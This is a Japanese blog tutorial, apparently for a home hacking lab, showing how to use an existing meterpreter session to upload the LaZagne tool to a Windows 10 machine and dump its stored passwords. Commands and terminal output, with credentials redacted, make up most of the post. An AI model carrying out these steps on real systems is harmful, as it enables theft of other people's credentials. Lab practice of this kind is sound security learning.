Windows 10 を遠隔操作し保持しているパスワードを特定する方法

Windows 10

今回は Windows 10 で保持している各種パスワードを特定します。
手法としては、パスワード検索アプリを Windows 10 にアップロードし、アプリの出力結果を Kali に出力させることでパスワードを特定します。

LaZagne のダウンロード

パスワード取得アプリの LaZagne をまず準備します。
Kali のブラウザで以下のURLにアクセスし、LaZagne (Windows.zip)をダウンロードします。
※DL、利用は自己責任でお願いします。

Releases · AlessandroZ/LaZagne
Credentials recovery project. Contribute to AlessandroZ/LaZagne development by creating an account on GitHub.

zip ファイルなので、解凍しておきます。

root@kali:~# cd /root/Downloads/
root@kali:~/Downloads# ls
Windows.zip
root@kali:~/Downloads# unzip Windows.zip 
Archive:  Windows.zip
   creating: Windows/
  inflating: Windows/laZagne.exe     
root@kali:~/Downloads# ls
Windows  Windows.zip
root@kali:~/Downloads# ls Windows
laZagne.exe
root@kali:~/Downloads#

Windows 10 へのアップロード

meterpreter プロンプトで「upload <ファイル名>」と実行することで対象のファイルをアップロードできます。
なお、アップロード元のディレクトリは /root のため、先に root ディレクトリにファイルを移動しておきます。

root@kali:~/Downloads/Windows# cp laZagne.exe /root

アップロード先はセッション確立先の現在のディレクトリになります。そのため事前に確認しておきます。

meterpreter > pwd
C:\Users\kdryo\Downloads
meterpreter >

meterpreter コマンドで、upload コマンドを実行します。

meterpreter > upload laZagne.exe
[*] uploading  : laZagne.exe -> laZagne.exe
[*] Uploaded 5.51 MiB of 5.51 MiB (100.0%): laZagne.exe -> laZagne.exe
[*] uploaded   : laZagne.exe -> laZagne.exe
meterpreter >

Windows 10 のダウンロードフォルダを見ると、laZagne.exe が保存されていることが確認できます。

laZagne.exe の実行

meterpreter プロンプトで「shell」を実行しコマンドプロンプトを操作できる状態にします。
この状態で、laZagne.exe が格納されているフォルダに移動し、ファイルを実行します。
オプションに all をつけることで全パスワードを取得できます。

C:\Users\kdryo\Downloads>laZagne.exe all
laZagne.exe all

---中略---

------------------- Credential manager passwords -----------------

Password found !!!
URL: XboxLive
Login: None
Password: 

Password found !!!
URL: MicrosoftAccount:
Login: 
Password: 

Password found !!!
URL: WindowsLive:(token):
Login: 
Password: 

Password found !!!
URL: OneDrive Cached Credential
Login: 
Password: 


[+] 4 passwords have been found.
For more information launch it again with the -v option


elapsed time = 0.0150001049042

C:\Users\kdryo\Downloads>

※ ID/Password は消しています。

このように、Windows 10 で保持しているパスワードを取得できました。(今回取得を試みたパスワードは非表示になっていたり、ハッシュ値となっていました。)

今回は以上です。

くどり

この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。

コメント

タイトルとURLをコピーしました